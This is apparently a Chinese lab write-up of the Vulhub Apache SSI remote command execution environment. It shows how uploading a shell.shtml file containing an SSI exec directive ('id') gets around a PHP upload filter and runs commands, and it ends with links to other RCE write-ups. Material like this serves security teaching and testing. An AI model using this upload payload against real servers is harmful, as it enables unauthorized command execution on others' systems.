Apache SSI 遠端命令執行漏洞
一、概述
在測試任意檔案上傳漏洞的時候,目標服務端可能不允許上傳php字尾的檔案。如果目標伺服器開啟了SSI與CGI支援,我們可以上傳一個shtml檔案,並利用<!--#exec cmd="id" -->語法執行任意命令。
參考:
https://vulhub.org/#/environments/httpd/ssi-rce/
二、漏洞環境
路徑:vulhub/httpd/ssi-rce
啟動一個支援SSI與CGI的Apache伺服器:docker-compose up -d
訪問http://192.168.220.139:8080/upload.php,就可以看到一個上傳表單:
三、漏洞復現
正常上傳PHP檔案是不允許的,我們可以上傳一個shell.shtml檔案:
shell.shtml檔案內容如下:
<!--#exec cmd="id" -->
訪問shell.shtml,可見命令已成功執行:
相關文章
- Apache Log4j2遠端命令執行漏洞Apache
- PHPMailer遠端命令執行漏洞復現PHPAI
- Apache Struts 再曝高危遠端程式碼執行漏洞Apache
- Firefox 31~34遠端命令執行漏洞的分析Firefox
- Apache OFBiz遠端程式碼執行漏洞(CVE-2024-38856)Apache
- CVE-2020-17530——Apache Struts遠端程式碼執行漏洞Apache
- 【安全公告】Spring Core遠端命令執行漏洞預警Spring
- CVE-2017-8464遠端命令執行漏洞復現
- Apache struts2遠端命令執行_CVE-2017-9805(S2-052)漏洞復現Apache
- Apache Solr應用伺服器存在遠端程式碼執行漏洞?ApacheSolr伺服器
- Apache log4j2 遠端程式碼執行漏洞復現?Apache
- Apache Kylin遠端程式碼執行漏洞復現(CVE-2020-1956)Apache
- Apache struts2 namespace遠端命令執行_CVE-2018-11776(S2-057)漏洞復現Apachenamespace
- ThinkPHP遠端程式碼執行漏洞PHP
- phpunit 遠端程式碼執行漏洞PHP
- ThinkPHP 5.x 遠端命令執行漏洞分析與復現PHP
- 高危漏洞!Apache Log4j 遠端程式碼執行漏洞(附修復建議)Apache
- 最新漏洞:Spring Framework遠端程式碼執行漏洞SpringFramework
- CNVD-2018-01084 漏洞復現報告(service.cgi 遠端命令執行漏洞)
- 靶機練習---通達OA,遠端命令執行漏洞復現
- CVE-2018-1273 Spring Data Commons 遠端命令執行漏洞復現Spring
- ThinkPHP 5.0.23 遠端程式碼執行漏洞PHP
- OpenWRT 曝遠端程式碼執行漏洞
- Joomla遠端程式碼執行漏洞分析OOM
- Apache struts2 Freemarker標籤遠端命令執行_CVE-2017-12611(S2-053)漏洞復現Apache
- Go實現ssh執行遠端命令及遠端終端Go
- RCE(遠端程式碼執行漏洞)原理及漏洞利用
- Oracle WebLogic 曝 0day 漏洞,攻擊者可遠端執行命令OracleWeb
- 什麼是遠端程式碼執行漏洞?
- .NET Remoting 遠端程式碼執行漏洞探究REM
- WindowsJScript元件曝遠端程式碼執行漏洞WindowsJS元件
- Saltstack系列2:Saltstack遠端執行命令
- 【核彈級漏洞】關於Apache Log4j 2遠端程式碼執行漏洞風險提示Apache
- 命令執行漏洞
- PKAV 發現 Struts2 最新遠端命令執行漏洞(S2-037)
- Apache Struts2遠端程式碼執行漏洞(S2-001)復現總結Apache
- Fastjson 1.2.24遠端程式碼執行漏洞(com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl)ASTJSONApache
- log4j遠端程式碼執行漏洞